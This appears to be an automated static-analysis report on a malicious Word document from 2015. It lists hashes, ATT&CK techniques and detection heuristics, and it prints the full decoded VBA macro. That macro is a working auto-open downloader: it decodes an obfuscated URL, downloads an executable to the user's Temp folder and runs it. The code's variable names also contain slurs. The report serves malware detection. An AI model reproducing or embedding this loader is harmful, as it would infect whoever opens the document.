Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 712b1b65d581fec4…

MALICIOUS

Office (OLE)

201.0 KB Created: 2015-07-09 05:20:00 Authoring application: Microsoft Office Word First seen: 2015-09-30
MD5: 83c4c6b50c4bce14154d21125d147a00 SHA-1: a0c7d495f357c4947174ee4fad4e147e73f93c69 SHA-256: 712b1b65d581fec47c93d62990b57ff63de5db81ef17b5111d4f7b09141d99be
310 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes the URLDownloadToFileA API, indicating an intent to download and execute a second-stage payload from a remote source. The obfuscated nature of the VBA code and the use of CreateObject further suggest malicious activity.

Heuristics 9

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function Sandboxie Lib "urlmon" Alias "URLDownloadToFileA" _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
       Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(GTAViceCityV)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(GTAViceCityV)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6122 bytes
SHA-256: bc6b71e3e2efaae2dc2bfa0036cc2bdacb45d9962f4f9c15e2986cb23c00d096
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function NulledIO Lib "advapi32.dll" Alias "GetUserNameA" _
    (ByVal lpBuffer As String, nSize As Long) As Long
    Private Declare PtrSafe Function Sandboxie Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
    Private Declare Function NulledIO Lib "advapi32.dll" Alias "GetUserNameA" _
    (ByVal lpBuffer As String, nSize As Long) As Long
    Private Declare Function Sandboxie Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If

Sub AutoOpen()
    Dim CalcOne As String
    Dim CalcTwo As String
    Dim CalcThree As String
    Dim CalcFour As String
    Dim CalcFive As String
    Dim loyagdbd As String
    Dim NewPathe As String
    Dim NewPath As String
    Dim CheckNumbers As String
    Dim TempColon As String
    Dim FuckTwo As String
    TempColon = ":"
    FuckTwo = "//"
    CalcOne = "abcdefgxxxZHHHijklmnopqrstuvwxyz"
    CalcTwo = Mid(CalcOne, 1, 15)
    CalcThree = Left(CalcTwo, 14)
    CalcFour = Right(CalcThree, 7)
    NothingIs = ""
    CalcFive = NothingIs & CalcFour & NothingIs
    CheckNumbers = ""
    NewPathe = EbayBuySellorExchange()
    NewPath = ""
    Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet abcd footage sda rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication rrrr efghy intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = AmazonOnlineShopping("xxx+772ynn!/p&*$9$.m-(6n(14m(;%", "BBBA")
    Dim GTAViceCityV As String: GTAViceCityV = AmazonOnlineShopping("xxxGAQDYDH C\W^^", 1331)
    ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
    iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
    OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & NewPath & "" & "C:\Users\" & NewPathe & "\AppData\Local\Temp" & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
    lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
    lFA9cYQDsQOBIWU = Sandboxie(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)
      
   If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
   Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(GTAViceCityV)
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
   End If
End Sub
Function EbayBuySellorExchange() As String
Dim lngLen As Long, lngX As Long
Dim MyBadAssNigga As String
    MyBadAssNigga = String$(254, 0)
    lngLen = 255
    lngX = NulledIO(MyBadAssNigga, lngLen)
    If lngX <> 0 Then
        EbayBuySellorExchange = Left$(MyBadAssNigga, lngLen - 1)
    Else
        EbayBuySellorExchange = ""
    End If
End Function
Function AmazonOnlineShopping(ByVal sData As String, ByVal sKey As String) As String
    Dim l As Long, i As Long, byIn() As Byte, byOut() As Byte, byKey() As Byte
    Dim bEncOrDec As Boolean
     'confirm valid string and key input:
    If Len(sData) = 0 Or Len(sKey) = 0 Then AmazonOnlineShopping = "Invalid argument(s) used": Exit Function
     'check whether running encryption or decryption (flagged by presence of "xxx" at start of sData):
    If Left(sData, 3) = "xxx" Then
        bEncOrDec = False 'decryption
        sData = Mid(sData, 4)
    Else
        bEncOrDec = True 'encryption
    End If
     'assign strings to byte arrays (unicode)
    byIn = sData
    byOut = sData
    byKey = sKey
    l = LBound(byKey)
    For i = LBound(byIn) To UBound(byIn) - 1 Step 2
        byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec 'avoid Chr$(0) by using bEncOrDec flag
        l = l + 2
        If l > UBound(byKey) Then l = LBound(byKey) 'ensure stay within bounds of Key
    Next i
    AmazonOnlineShopping = byOut
    If bEncOrDec Then AmazonOnlineShopping = "xxx" & AmazonOnlineShopping 'add "xxx" onto encrypted text
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.